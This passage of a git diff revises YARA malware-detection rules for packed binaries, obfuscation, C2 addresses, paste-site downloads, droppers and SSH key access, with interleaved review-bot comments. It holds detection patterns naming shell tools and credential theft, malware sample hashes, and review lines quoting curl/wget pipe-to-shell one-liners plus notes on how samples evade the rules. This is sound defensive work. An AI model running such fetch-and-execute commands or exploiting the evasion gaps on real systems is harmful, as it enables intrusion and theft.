diff --git a/pkg/action/testdata/scan_archive b/pkg/action/testdata/scan_archive index 3ca22cb57..0b61fe87b 100644 --- a/pkg/action/testdata/scan_archive +++ b/pkg/action/testdata/scan_archive @@ -1,6 +1,6 @@ # testdata/apko_nested.tar.gz ∴ /apko_0.13.2_linux_arm64/apko: medium c2/addr/ip: medium -c2/server_address: medium +c2/addr/server: medium collect/archives/zip: medium credential/keychain: medium credential/password: low @@ -25,14 +25,15 @@ discover/network/interface_list: medium discover/network/mac_address: medium discover/network/netstat: medium discover/processes/pgrep: medium -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/dmesg: low +discover/system/hostname: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low discover/user/name_get: medium evasion/bypass_security/linux/se: medium -evasion/hidden_paths/hidden: medium +evasion/file/prefix: medium evasion/hide_artifacts/pivot_root: medium exec/plugin: low exec/program: medium diff --git a/rules/anti-static/packer/elf.yara b/rules/anti-static/elf/content.yara similarity index 58% rename from rules/anti-static/packer/elf.yara rename to rules/anti-static/elf/content.yara index bdee7686e..5620752d2 100644 --- a/rules/anti-static/packer/elf.yara +++ b/rules/anti-static/elf/content.yara @@ -1,4 +1,4 @@ -import "math" +import "elf" rule obfuscated_elf: high linux { meta: 
@@ -27,21 +27,5 @@ rule obfuscated_elf: high linux { $debuglink = ".gnu_debuglink" fullword condition: - uint32(0) == 1179403647 and none of them -} - -rule high_entropy_header: high { - meta: - description = "high entropy ELF header (>7)" - hash_2023_UPX_0c25 = "0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d" - hash_2023_UPX_5a59 = "5a5960ccd31bba5d47d46599e4f10e455b74f45dad6bc291ae448cef8d1b0a59" - hash_2023_FontOnLake_38B09D690FAFE81E964CBD45EC7CF20DCB296B4D_elf = "f155fafa36d1094433045633741df98bbbc1153997b3577c3fa337cc525713c0" - - strings: - $not_pyinst = "pyi-bootloader-ignore-signals" - $not_go = "syscall_linux.go" - $not_go2 = "vdso_linux.go" - - condition: - uint32(0) == 1179403647 and math.entropy(1200, 4096) > 7 and none of ($not*) + filesize > 512 and elf.type == elf.ET_EXEC and uint32(0) == 1179403647 and none of them } diff --git a/rules/anti-static/elf/entropy.yara b/rules/anti-static/elf/entropy.yara new file mode 100644 index 000000000..e47b11a12 --- /dev/null +++ b/rules/anti-static/elf/entropy.yara @@ -0,0 +1,30 @@ +import "math" + +private rule normal_elf { + condition: + filesize < 64MB and uint32(0) == 1179403647 +} + +private rule small_elf { + condition: + filesize < 400KB and uint32(0) == 1179403647 +} + +rule normal_elf_high_entropy_7: medium { + meta: + description = "higher entropy ELF binary (>7.1)" + + condition: + normal_elf and math.entropy(1, filesize) >= 7.1 +} + +rule normal_elf_high_entropy_7_4: high { + meta: + description = "high entropy ELF binary (>7.4)" + + strings: + $not_whirlpool = "libgcrypt-grub/cipher/whirlpool.c" + + condition: + normal_elf and math.entropy(1, filesize) >= 7.4 and none of ($not*) +} diff --git a/rules/anti-static/elf/header.yara b/rules/anti-static/elf/header.yara index 252ca50b0..3cd577aee 100644 --- a/rules/anti-static/elf/header.yara +++ b/rules/anti-static/elf/header.yara @@ -1,4 +1,5 @@ import "elf" +import "math" rule single_load_rwe: critical { meta: 
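Review bot: The new `elf.type == elf.ET_EXEC` term in obfuscated_elf's condition silently drops every position-independent executable, since PIE binaries carry ET_DYN and are the default output of current gcc/clang on the major distributions, so the rule will no longer fire on most freshly built obfuscated ELFs. If the gate was added to keep shared objects out, the PT_INTERP program header separates a PIE executable from a library far better than e_type: `(elf.type == elf.ET_EXEC or (elf.type == elf.ET_DYN and for any i in (0..elf.number_of_segments): (elf.segments[i].type == elf.PT_INTERP)))`. The string set that `none of them` refers to is defined above this hunk.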
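Review bot: `small_elf` is declared but never referenced by either rule in this file, so it is dead code that will only surface as a duplicate-identifier error if another file later defines the same private rule. The descriptions say ">7.1" and ">7.4" while the conditions use `>=`; make them agree. `math.entropy(1, filesize)` skips byte 0 and asks for one byte past EOF — YARA clamps the range so it still works, but `math.entropy(0, filesize)` states what is meant.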
@@ -38,3 +39,20 @@ rule fake_dynamic_symbols: critical { condition: elf.type == elf.ET_EXEC and elf.entry_point < filesize and elf.number_of_sections > 0 and elf.dynamic_section_entries > 0 and for any i in (0..elf.dynamic_section_entries): (elf.dynamic[i].type == elf.DT_SYMTAB and not (for any j in (0..elf.number_of_sections): (elf.sections[j].type == elf.SHT_DYNSYM and for any k in (0..elf.number_of_segments): ((elf.segments[k].virtual_address <= elf.dynamic[i].val) and ((elf.segments[k].virtual_address + elf.segments[k].file_size) >= elf.dynamic[i].val) and (elf.segments[k].offset + (elf.dynamic[i].val - elf.segments[k].virtual_address)) == elf.sections[j].offset)))) } + +rule high_entropy_header: high { + meta: + description = "high entropy ELF header (>7)" + hash_2023_UPX_0c25 = "0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d" + hash_2023_UPX_5a59 = "5a5960ccd31bba5d47d46599e4f10e455b74f45dad6bc291ae448cef8d1b0a59" + hash_2023_FontOnLake_38B09D690FAFE81E964CBD45EC7CF20DCB296B4D_elf = "f155fafa36d1094433045633741df98bbbc1153997b3577c3fa337cc525713c0" + + strings: + $not_pyinst = "pyi-bootloader-ignore-signals" + $not_go = "syscall_linux.go" + $not_go2 = "vdso_linux.go" + $not_module = ".module_license" fullword + + condition: + uint32(0) == 1179403647 and elf.type == elf.ET_EXEC and math.entropy(1200, 4096) > 7 and none of ($not*) +} diff --git a/rules/anti-static/elf/tiny.yara b/rules/anti-static/elf/tiny.yara new file mode 100644 index 000000000..48edec212 --- /dev/null +++ b/rules/anti-static/elf/tiny.yara @@ -0,0 +1,12 @@ +import "elf" + +rule impossibly_small_elf_program: high { + meta: + description = "ELF binary is unusually small" + + strings: + $not_hello_c = "hello.c" + + condition: + filesize < 8192 and filesize > 900 and uint32(0) == 1179403647 and elf.type == elf.ET_EXEC and none of ($not*) +} diff --git a/rules/anti-static/macho/entropy.yara b/rules/anti-static/macho/entropy.yara new file mode 100644 index 000000000..6cd1ea679 
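Review bot: The added `elf.type == elf.ET_EXEC` gate in high_entropy_header excludes PIE binaries (ET_DYN), and the meta cites UPX samples — as far as I recall UPX keeps the input's e_type, so a UPX-packed PIE would now pass this `high` rule untouched. If the gate exists to silence shared objects, allow ET_DYN files that carry a PT_INTERP segment instead of excluding ET_DYN outright. Note also that `math.entropy(1200, 4096)` on a file shorter than 5296 bytes is, as far as I can tell, scored over whatever bytes exist, so tiny packed stubs are measured on less than the intended window; `filesize > 5296` would keep the threshold honest.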
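Review bot: The new `filesize > 900` floor in impossibly_small_elf_program exempts exactly the smallest hand-assembled ELFs — a minimal static loader produced with nasm and ld is a few hundred bytes — which is the "impossibly small" case the description targets. If the floor exists to skip a test fixture, prefer an explicit exclusion over a size cut. `$not_hello_c = "hello.c"` is likewise a one-token exemption a sample can carry for free; if it was added for one fixture, anchor it on something longer than the bare file name.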
--- /dev/null +++ b/rules/anti-static/macho/entropy.yara @@ -0,0 +1,26 @@ +import "math" + +private rule smaller_macho { + condition: + filesize < 64MB and (uint32(0) == 4277009102 or uint32(0) == 3472551422 or uint32(0) == 4277009103 or uint32(0) == 3489328638 or uint32(0) == 3405691582 or uint32(0) == 3199925962) +} + +rule high_entropy_7_2: medium { + meta: + description = "higher entropy binary (>7.2)" + + condition: + smaller_macho and math.entropy(1, filesize) >= 7.2 +} + +rule high_entropy_7_9: high { + meta: + description = "high entropy binary (>7.9)" + + strings: + // prevent bazel false positive + $bin_java = "bin/java" + + condition: + smaller_macho and math.entropy(1, filesize) >= 7.9 and not $bin_java +} diff --git a/rules/anti-static/binary/tiny.yara b/rules/anti-static/macho/tiny.yara similarity index 70% rename from rules/anti-static/binary/tiny.yara rename to rules/anti-static/macho/tiny.yara index acd73140d..6f50f3f43 100644 --- a/rules/anti-static/binary/tiny.yara +++ b/rules/anti-static/macho/tiny.yara @@ -1,13 +1,3 @@ -import "elf" - -rule impossibly_small_elf_program: high { - meta: - description = "ELF binary is unusually small" - - condition: - filesize < 8192 and uint32(0) == 1179403647 and elf.type == elf.ET_EXEC -} - rule impossibly_small_macho_program: medium { meta: description = "machO binary is unusually small" diff --git a/rules/anti-static/obfuscation/bitwise.yara b/rules/anti-static/obfuscation/bitwise.yara index 6dc723eb9..0863d03fd 100644 --- a/rules/anti-static/obfuscation/bitwise.yara +++ b/rules/anti-static/obfuscation/bitwise.yara 
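Review bot: `smaller_macho` accepts `uint32(0) == 3199925962`, i.e. the on-disk bytes CA FE BA BE, which is also the magic of every Java `.class` file, so both entropy rules here run over class files as well as Mach-O fat binaries — the `$bin_java` carve-out for bazel suggests this has already been hit once. A fat header stores a small arch count at offset 4 while a class file stores a major version of 45 or more there, so requiring `uint32be(4) < 20` for the CAFEBABE forms (the same heuristic file(1) uses) keeps class files out without a string exclusion. `math.entropy(1, filesize)` skips byte 0; `math.entropy(0, filesize)` is the conventional form.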
@@ -22,14 +22,22 @@ rule excessive_bitwise_math: high { hash_2023_aiohttpp_0_1_setup = "cfa4137756f7e8243e7c7edc7cb0b431a2f4c9fa401f2570f1b960dbc86ca7c6" strings: - $x = /\-{0,1}[\da-z]{1,8} \<\< \-{0,1}\d{1,8}/ - $not_Sodium = "Sodium_Core" - $not_SHA512 = "SHA512" - $not_SHA256 = "SHA256" - $not_MD4 = "MD4" - $not_algbase = "algbase" fullword - $not_jslint = "jslint bitwise" - $not_include = "#define " + $x = /\-{0,1}[\da-z]{1,8} \<\< \-{0,1}\d{1,8}/ + $not_Sodium = "Sodium_Core" + $not_SHA512 = "SHA512" + $not_SHA256 = "SHA256" + $not_MD4 = "MD4" + $not_algbase = "algbase" fullword + $not_jslint = "jslint bitwise" + $not_include = "#define " + $not_bitwise = "bitwise" fullword + $not_bitmasks = "bitmasks" fullword + $not_ckbcomp = "ckbcomp" fullword + $not_bit_test = "bits_test" fullword + $not_testing = "*testing.T" + $not_effective_bits = "effective bits" + $not_bit_offsets = "bit offsets" + $not_uuid = "uuid" fullword condition: filesize < 192KB and #x > 64 and none of ($not*) diff --git a/rules/anti-static/obfuscation/hex.yara b/rules/anti-static/obfuscation/hex.yara index 830f2758c..9e7585e13 100644 --- a/rules/anti-static/obfuscation/hex.yara +++ b/rules/anti-static/obfuscation/hex.yara 
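Review bot: `$not_uuid = "uuid" fullword` turns excessive_bitwise_math off for any file that mentions uuid, which in JavaScript and Python covers a large share of both legitimate and malicious code (machine-id generation is a common beacon field), and `$not_bitwise`/`$not_bitmasks` are similarly cheap for an author to include. Because the condition is a presence-only `none of ($not*)`, one token vetoes more than 64 shift expressions; if these were added for specific false positives, anchor them to that source (a path or a full phrase), or weigh them against the signal, e.g. `#x > 64 and #x > 8 * #not_uuid`. The `$x` definition and the rule's meta sit above this hunk.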
@@ -51,13 +51,14 @@ rule hex_parse_base64_high: high { hash_1985_package_index = "8d4daa082c46bfdef3d85a6b5e29a53ae4f45197028452de38b729d76d3714d1" strings: - $lang_node = /Buffer\.from\(\w{0,16}, {0,2}'hex'\)/ - $lang_python = /\.unhexlify\(/ - $b_base64 = "base64" - $b_b64decode = "b64decode" - $not_sha256 = "sha256" fullword - $not_sha512 = "sha512" fullword - $not_algorithms = "algorithms" fullword + $lang_node = /Buffer\.from\(\w{0,16}, {0,2}'hex'\)/ + $lang_python = /\.unhexlify\(/ + $b_base64 = "base64" + $b_b64decode = "b64decode" + $not_sha256 = "sha256" fullword + $not_sha512 = "sha512" fullword + $not_algorithms = "algorithms" fullword + $not_python_base64 = "return binascii.unhexlify(s)" condition: filesize < 32KB and any of ($lang*) and any of ($b*) and none of ($not*) diff --git a/rules/anti-static/obfuscation/python.yara b/rules/anti-static/obfuscation/python.yara index dce5d126b..16d69cf7c 100644 --- a/rules/anti-static/obfuscation/python.yara +++ b/rules/anti-static/obfuscation/python.yara @@ -220,8 +220,11 @@ rule fernet_base64: high { $o6 = "exec(" $o7 = "eval(" + $not_utils = "from cryptography import utils" + $not_fernet_itself = "class Fernet" + condition: - filesize < 2MB and any of ($fernet*) and any of ($bdecode*) and any of ($o*) + filesize < 2MB and any of ($fernet*) and any of ($bdecode*) and any of ($o*) and none of ($not*) } rule python_long_hex: medium { @@ -261,8 +264,10 @@ rule python_hex_decimal: high { $trash = /\\x{0,1}\d{1,3}\\/ + $not_testing_t = "*testing.T" fullword + condition: - filesize < 1MB and any of ($f*) and #trash in (filesize - 1024..filesize) > 100 + filesize < 1MB and any of ($f*) and #trash in (filesize - 1024..filesize) > 100 and none of ($not*) } rule dumb_int_compares: high { diff --git a/rules/anti-static/packer/cx_freeze.yara b/rules/anti-static/packer/cx_freeze.yara index 9240d050c..5de1b23a8 100644 --- a/rules/anti-static/packer/cx_freeze.yara +++ b/rules/anti-static/packer/cx_freeze.yara 
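Review bot: `$not_utils = "from cryptography import utils"` lets fernet_base64 be silenced by a single import line that a script can add without changing its behaviour, and `$not_fernet_itself = "class Fernet"` also exempts a trojanized or vendored copy of fernet.py that tacks `exec(` of the decrypted payload onto the end. If these were added to stop the library's own fernet.py from matching, anchor on something a dropper would not plausibly copy — for example require both `class Fernet` and `class MultiFernet` before exempting. The `$fernet*` and `$bdecode*` definitions are above this hunk.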
@@ -3,8 +3,9 @@ rule cxFreeze_Python_executable: high { hash_2023_MacStealer_weed = "6a4f8b65a568a779801b72bce215036bea298e2c08ec54906bb3ebbe5c16c712" strings: - $cxfreeze = "cx_Freeze" + $cxfreeze = "cx_Freeze" + $not_importlib = "tool like cx_Freeze" condition: - filesize < 10485760 and $cxfreeze + filesize < 10485760 and $cxfreeze and none of ($not*) } diff --git a/rules/anti-static/packer/high_entropy.yara b/rules/anti-static/packer/high_entropy.yara deleted file mode 100644 index ec1c7673a..000000000 --- a/rules/anti-static/packer/high_entropy.yara +++ /dev/null @@ -1,27 +0,0 @@ -import "math" - -private rule smallBinary { - condition: - // matches ELF or machO binary - filesize < 64MB and (uint32(0) == 1179403647 or uint32(0) == 4277009102 or uint32(0) == 3472551422 or uint32(0) == 4277009103 or uint32(0) == 3489328638 or uint32(0) == 3405691582 or uint32(0) == 3199925962) -} - -rule high_entropy_7_5: medium { - meta: - description = "higher entropy binary (>7.5)" - - condition: - smallBinary and math.entropy(1, filesize) >= 7.5 -} - -rule high_entropy_7_9: high { - meta: - description = "high entropy binary (>7.9)" - - strings: - // prevent bazel false positive - $bin_java = "bin/java" - - condition: - smallBinary and math.entropy(1, filesize) >= 7.9 and not $bin_java -} diff --git a/rules/c2/addr/ip.yara b/rules/c2/addr/ip.yara index d7f85d70d..561bc67e1 100644 --- a/rules/c2/addr/ip.yara +++ b/rules/c2/addr/ip.yara 
@@ -30,15 +30,17 @@ rule elf_hardcoded_ip: high { strings: // stricter version of what's above: excludes 255.* and *.0.* *.1.*, and 8.* (likely Google) - $sus_ipv4 = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2345679])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])/ fullword - $not_version = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])[\.\-]/ - $not_incr = "10.11.12.13" - $not_169 = "169.254.169.254" - $not_spyder = "/search/spider" - $not_ruby = "210.251.121.214" - $not_1_2_3_4 = "1.2.3.4" - $not_root_servers_h = "128.63.2.53" - $not_root_servers_i = "192.36.148.17" + $sus_ipv4 = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2345679])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])/ fullword + $not_version = /((25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])\.){3}(25[0-4]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[2-9])[\.\-]/ + $not_incr = "10.11.12.13" + $not_169 = "169.254.169.254" + $not_spyder = "/search/spider" + $not_ruby = "210.251.121.214" + $not_1_2_3_4 = "1.2.3.4" + $not_root_servers_h = "128.63.2.53" + $not_root_servers_i = "192.36.148.17" + $not_123456789 = "123.45.67.89" + $not_libebt_among_init = "libebt_among_init" condition: filesize < 12MB and uint32(0) == 1179403647 and 1 of ($sus_ip*) and none of ($not*) @@ -73,14 +75,17 @@ rule hardcoded_ip_port: high { strings: $ipv4 = /([1-9][0-9]{1,2}\.){3}[1-9][0-9]{1,2}:\d{2,5}/ fullword - $not_ssdp = "239.255.255.250:1900" + $not_ssdp = "239.255.255.250:" $not_2181 = "10.101.203.230:2181" - $not_meta = "169.254.169.254:80" - $not_vnc = "10.10.10.10:5900" + $not_meta = "169.254.169.254:" + $not_vnc = "10.10.10.10:" $not_azure_pgsql = "20.66.25.58:5432" $not_wireguard = "127.212.121.99:999" $not_minio = "172.16.34.31:9000" $not_test = "def test_" fullword + $not_12 = "12.12.12.12:" + $not_21 = "21.21.21.21:" + $not_255 = "255.255.255.255:" condition: any of ($ip*) and none of ($not*) 
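Review bot: In hardcoded_ip_port the new prefix-only exclusions (`169.254.169.254:`, `10.10.10.10:`, `12.12.12.12:`, `21.21.21.21:`, `255.255.255.255:`) make `none of ($not*)` a blanket veto: one SSDP or metadata literal anywhere in the file hides a real `45.x.x.x:4444` beside it, and an author can embed `10.10.10.10:` as a decoy. Every IP literal in the `$not*` set is itself a prefix of a `$ipv4` match, so counting is more robust than presence: `#ipv4 > #not_ssdp + #not_2181 + #not_meta + #not_vnc + #not_azure_pgsql + #not_wireguard + #not_minio + #not_12 + #not_21 + #not_255 and not $not_test` fires only when an IP:port the exclusions do not account for is present. The rule also has no `filesize` bound, unlike elf_hardcoded_ip above it.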
diff --git a/rules/c2/addr/server.yara b/rules/c2/addr/server.yara index c45a2b497..b271b37fd 100644 --- a/rules/c2/addr/server.yara +++ b/rules/c2/addr/server.yara @@ -1,21 +1,19 @@ -rule server_addr: medium { +rule server_address: medium { meta: - description = "may execute a shell and communicate with a server" + description = "references a 'server address', possible C2 client" + hash_2024_Downloads_3105 = "31054fb826b57c362cc0f0dbc8af15b22c029c6b9abeeee9ba8d752f3ee17d7d" + hash_2023_Linux_Malware_Samples_450a = "450a7e35f13b57e15c8f4ce1fa23025a7c313931a394c40bd9f3325b981eb8a8" + hash_2023_Linux_Malware_Samples_458e = "458e3e66eff090bc5768779d5388336c8619a744f486962f5dfbf436a524ee04" strings: - $serverAddr = "serverAddr" - $server_addr = "server_addr" - $exec = "exec" - $sh = "/bin/sh" fullword - $sh_bash = "/bin/bash" fullword - $sh_zsh = "/bin/zsh" fullword - $sh_script = "ShellScript" - $sh_exec = "ExecShell" - $sh_cmd = "cmd.exe" - $sh_powershell = "powershell.exe" + $s_underscores = /\w{0,32}server_addr\w{0,32}/ + $s_mixed = /\w{0,32}serverAddr\w{0,32}/ + $s_url = "serverURL" fullword + $s_url2 = "serverUrl" fullword + $s_connect = /\w{0,32}ConnectServer\w{0,32}/ condition: - filesize < 10MB and any of ($server*) and $exec and any of ($sh*) + any of ($s*) } rule server_addr_small: high { @@ -34,6 +32,8 @@ rule server_addr_small: high { $sh_cmd = "cmd.exe" $sh_powershell = "powershell.exe" + $hash_bang = "#!" + condition: - filesize < 128KB and any of ($server*) and $exec and any of ($sh*) + filesize < 1MB and any of ($server*) and $exec and any of ($sh*) and not $hash_bang in (0..3) } diff --git a/rules/c2/addr/url.yara b/rules/c2/addr/url.yara index bbdfdb214..49d3a22fc 100644 --- a/rules/c2/addr/url.yara +++ b/rules/c2/addr/url.yara 
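Review bot: The rebuilt server_address rule has no `filesize` bound while server_addr_small and most other c2 rules in this change cap input size, so `any of ($s*)` with four `\w{0,32}…\w{0,32}` regexes now runs over arbitrarily large inputs. `$s_connect` (`ConnectServer`) also matches the WMI `SWbemLocator.ConnectServer` call found in a great deal of ordinary Windows administrative scripting; a `$not_` anchor or a sentence in the description would make the medium hit interpretable.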
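Review bot: `not $hash_bang in (0..3)` exempts any file that opens with `#!` from server_addr_small, so a Python or Node dropper that pairs `serverAddr` with `exec` and `/bin/sh` is now caught only by the medium rule, and a plain text file can opt out by prepending a shebang. If the exemption is for shell scripts whose own `/bin/sh` reference was the false-positive source, narrow it to those: `$shebang_sh = /^#![\w\/ ]{0,24}\/(ba|z|da)?sh/` with `not $shebang_sh at 0`. `in (0..3)` also accepts a shebang the kernel would never honour; `at 0` is the real script case. The `$server*` and `$exec` definitions are above this hunk.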
@@ -25,25 +25,13 @@ rule exotic_tld: high { $not_gov_bd = ".gov.bd" $not_eol = "endoflife.date" $not_whois = "bdia.btcl.com.bd" + $not_arduino = "arduino.cc" condition: filesize < 10MB and any of ($http*) and none of ($not_*) } -rule binary_http_url_with_question: high { - meta: - description = "contains hardcoded endpoint with a question mark" - - strings: - $ref = /https*:\/\/[\w\.\/]{8,160}\.[a-zA-Z]{2,3}\?[\w\=\&]{0,32}/ - $not_cvs_sourceforge = /cvs.sourceforge.net.{0,64}\?rev=/ - $not_rev_head = "?rev=HEAD" - - condition: - filesize < 150MB and elf_or_macho and $ref and none of ($not*) -} - -rule script_with_binary_http_url_with_question: high { +rule http_url_with_question: medium { meta: description = "contains hardcoded endpoint with a question mark" @@ -59,7 +47,38 @@ rule script_with_binary_http_url_with_question: high { $ref = /https*:\/\/[\w\.\/]{8,160}\.[a-zA-Z]{2,3}\?[\w\=\&]{0,32}/ $not_cvs_sourceforge = /cvs.sourceforge.net.{0,64}\?rev=/ $not_rev_head = "?rev=HEAD" + $not_cgi = ".cgi?" condition: filesize < 256KB and any of ($f*) and $ref and none of ($not*) } + +rule binary_url_with_question: high { + meta: + description = "binary contains hardcoded URL with question mark" + + strings: + $ref = /https*:\/\/[\w\.\/]{8,160}\.(asp|php|exe|dll)\?[\w\=\&]{0,32}/ + + condition: + filesize < 150MB and elf_or_macho and $ref +} + +rule script_url_with_question: high { + meta: + description = "script contains hardcoded URL with question mark" + + strings: + $f_import = "import" fullword + $f_require = "require" fullword + $f_curl = "curl" fullword + $f_wget = "wget" fullword + $f_requests = "requests.get" fullword + $f_requests_post = "requests.post" fullword + $f_urllib = "urllib.request" fullword + $f_urlopen = "urlopen" fullword + $ref = /https*:\/\/[\w\.\/]{8,160}\.(asp|php|exe|dll)\?[\w\=\&]{0,32}/ + + condition: + filesize < 256KB and any of ($f*) and $ref +} 
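Review bot: The `$ref` regex in binary_url_with_question and script_url_with_question uses `[\w\.\/]` for host and path, which has no `-`, so URLs on hyphenated hosts (`cdn-update.example.com/gate.php?id=`) or with hyphenated paths never match, and the alternation `(asp|php|exe|dll)` misses `.aspx` and `.jsp` because the next character must be `?`. Suggest `/https?:\/\/[\w\.\/\-]{8,160}\.(aspx?|php|jsp|exe|dll)\?[\w\=\&]{0,32}/` in both rules. `https*` also accepts `httpsss://`; `https?` is what is meant.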
diff --git a/rules/c2/server_address.yara b/rules/c2/server_address.yara deleted file mode 100644 index 2504fbc73..000000000 --- a/rules/c2/server_address.yara +++ /dev/null @@ -1,16 +0,0 @@ -rule server_address: medium { - meta: - description = "references a 'server address', possible C2 client" - hash_2024_Downloads_3105 = "31054fb826b57c362cc0f0dbc8af15b22c029c6b9abeeee9ba8d752f3ee17d7d" - hash_2023_Linux_Malware_Samples_450a = "450a7e35f13b57e15c8f4ce1fa23025a7c313931a394c40bd9f3325b981eb8a8" - hash_2023_Linux_Malware_Samples_458e = "458e3e66eff090bc5768779d5388336c8619a744f486962f5dfbf436a524ee04" - - strings: - $underscores = /\w{0,32}server_addr\w{0,32}/ - $mixed = /\w{0,32}serverAddr\w{0,32}/ - $url = "serverURL" fullword - $url2 = "serverUrl" fullword - - condition: - any of them -} diff --git a/rules/c2/tool_transfer/download.yara b/rules/c2/tool_transfer/download.yara index 3686d3042..a800bb59e 100644 --- a/rules/c2/tool_transfer/download.yara +++ b/rules/c2/tool_transfer/download.yara @@ -7,18 +7,19 @@ rule download_sites: high { hash_2024_2024_GitHub_Clipper_raw = "e9f89885876c1958bc6eede3373e4f3c4d76a5bc35a247fb7531b757798cb032" strings: - $d_privatebin = /[\w\.]+privatebin[\w\.]+/ - $d_pastecode_dot = /pastecode\.[\w\.]+/ + $d_privatebin = /[\w\.]+privatebin[\w\.]{1,4}\// + $d_pastecode_dot = /pastecode\.[\w\.]{2,16}/ + $d_paste_dot = /\/paste\.[\w\.]{2,3}\// $d_discord = "cdn.discordapp.com" $d_pastebinger = "paste.bingner.com" $d_transfer_sh = "transfer.sh" $d_rentry = "rentry.co" fullword - $d_pastebin = /pastebin\.[\w]{2,3}/ fullword + $d_pastebin = /pastebin\.[\w]{2,3}[\w\/]{0,16}/ fullword $d_penyacom = "penyacom" $d_controlc = "controlc.com" $d_anotepad = "anotepad.com" $d_privnote = "privnote.com" - $d_hushnote = "hushnote" + $d_hushnote = /hushnote[\.\w\/]{3,16}/ $not_mozilla = "download.mozilla.org" $not_google = "dl.google.com" $not_manual = "manually upload" 
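Review bot: `$d_pastebin = /pastebin\.[\w]{2,3}[\w\/]{0,16}/ fullword` now fails on longer paths: YARA applies fullword to the longest match the engine returns, so `pastebin.com/api/api_post.php` (17 path characters) is cut at 16 and the following word character makes the fullword check reject it. Either widen the tail to something URL-sized, e.g. `[\w\/\.\-]{0,64}`, or drop `fullword` and accept the occasional `mypastebin.` hit. `$d_privatebin` still requires `[\w\.]+` before `privatebin`, so a bare `https://privatebin.net/` does not match at all and only subdomain forms do; if that is unintended, make the prefix `{0,}` or anchor on `privatebin\.` instead.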
diff --git a/rules/c2/tool_transfer/shell.yara b/rules/c2/tool_transfer/shell.yara index 3226a2d98..45b6c3ed1 100644 --- a/rules/c2/tool_transfer/shell.yara +++ b/rules/c2/tool_transfer/shell.yara @@ -156,11 +156,10 @@ rule fetch_chmod_execute: high { rule possible_dropper: high { meta: - description = "downloads and execute a program" + description = "download and execute a program" strings: - $http = "http://" - $https = "https://" + $http = /https{0,1}:\/\/[\.\w\/\?\=\-]{1,64}/ $tool_curl_o = /curl [\w\.\- :\"\/]{0,64}-\w{0,2}[oO][\w\.\- :\"\/]{0,64}/ $tool_wget_q = "wget -" $tool_lwp = "lwp-download" @@ -169,10 +168,10 @@ rule possible_dropper: high { $cmd_rm = "rm" fullword $cmd_sleep = "sleep" fullword $cmd_echo = "echo" fullword - $cmd_chmod = "chmod" fullword + $chmod = "chmod" fullword condition: - filesize < 1KB and any of ($http*) and any of ($tool*) and any of ($cmd*) + filesize < 1KB and any of ($http*) and $chmod and any of ($tool*) and any of ($cmd*) } rule nohup_dropper: critical { diff --git a/rules/credential/ssh/ssh.yara b/rules/credential/ssh/ssh.yara index fd0f0add5..35321cf07 100644 --- a/rules/credential/ssh/ssh.yara +++ b/rules/credential/ssh/ssh.yara @@ -8,14 +8,14 @@ rule ssh_folder: medium { strings: $slash = "/.ssh" - $re = /[\$\%\{\}\w\/]{0,16}\.ssh[\w\/]{0,16}/ fullword + $re = /[\~\$\%\{\}\w\/]{0,16}\.ssh[\w\/]{0,16}/ fullword $pkg = /[a-z]{2,16}\.ssh/ condition: filesize < 20MB and $slash or ($re and not $pkg) } -rule id_rsa: high { +rule id_rsa: medium { meta: description = "accesses SSH private keys" 
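Review bot: possible_dropper now requires `$chmod`, so the common one-liner that never touches the mode — `curl -s http://x/y | sh`, `wget -qO- http://x/y | bash` — no longer reaches this `high` rule; if fetch_chmod_execute or another rule covers the pipe-to-interpreter form, a one-line comment saying so will stop the next reader from re-adding it here. The new `$http` class `[\.\w\/\?\=\-]` has no `:` or `%`, so `http://1.2.3.4:8080/x` is matched only up to the port — still enough for `any of ($http*)`, but the reported match is truncated; adding `:` and `%` to the class costs nothing.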
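Review bot: The condition kept as context in ssh_folder, `filesize < 20MB and $slash or ($re and not $pkg)`, parses as `(filesize < 20MB and $slash) or ($re and not $pkg)` because `and` binds tighter than `or` in YARA, so the size cap never applies to the `$re` branch — and this change widens `$re` with `~`, sending more large files through it. That predates the commit but is worth fixing while the line is touched: `filesize < 20MB and ($slash or ($re and not $pkg))`. The downgrade of id_rsa to medium is reasonable given the new id_rsa_not_ssh rule below.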
@@ -25,3 +25,20 @@ rule id_rsa: high { condition: filesize < 10MB and ssh_folder and $id_rsa } + +rule id_rsa_not_ssh: high { + meta: + description = "non-SSH client accessing SSH private keys" + + strings: + $id_rsa = "id_rsa" fullword + $not_ssh_newkeys = "SSH_MSG" + $not_ssh_userauth = "SSH_USERAUTH" + $not_ssh_20 = "SSH-2.0" + $not_openssh = "OpenSSH" + $not_ssh2 = "SSH2" fullword + $not_SSH_AUTH_SOCK = "SSH_AUTH_SOCK" + + condition: + filesize < 10MB and ssh_folder and $id_rsa and none of ($not*) +} diff --git a/rules/data/embedded/embedded-base64-elf.yara b/rules/data/embedded/embedded-base64-elf.yara new file mode 100644 index 000000000..3c2418ec7 --- /dev/null +++ b/rules/data/embedded/embedded-base64-elf.yara @@ -0,0 +1,10 @@ +rule base64_elf: high { + meta: + description = "Contains base64 encoded ELF binary" + + strings: + $header = "f0VMRgEBAQ" + + condition: + $header +} diff --git a/rules/discover/system/system_network.yara b/rules/discover/multiple.yara similarity index 84% rename from rules/discover/system/system_network.yara rename to rules/discover/multiple.yara index 9e7677b65..09410e974 100644 --- a/rules/discover/system/system_network.yara +++ b/rules/discover/multiple.yara @@ -49,13 +49,15 @@ private rule obfuscate { private rule exfil { strings: - $f_b64decode = "application/json" - $f_post = "requests.post" - $f_nsurl = "NSURLRequest" - $f_curl = /curl.{0,32}-X POST/ + $f_app_json = "application/json" + $f_post = "requests.post" + $f_nsurl = "NSURLRequest" + $f_curl = /curl.{0,32}-X POST/ + + $not_requests_utils = "requests.utils" condition: - filesize < 512KB and any of them + filesize < 512KB and 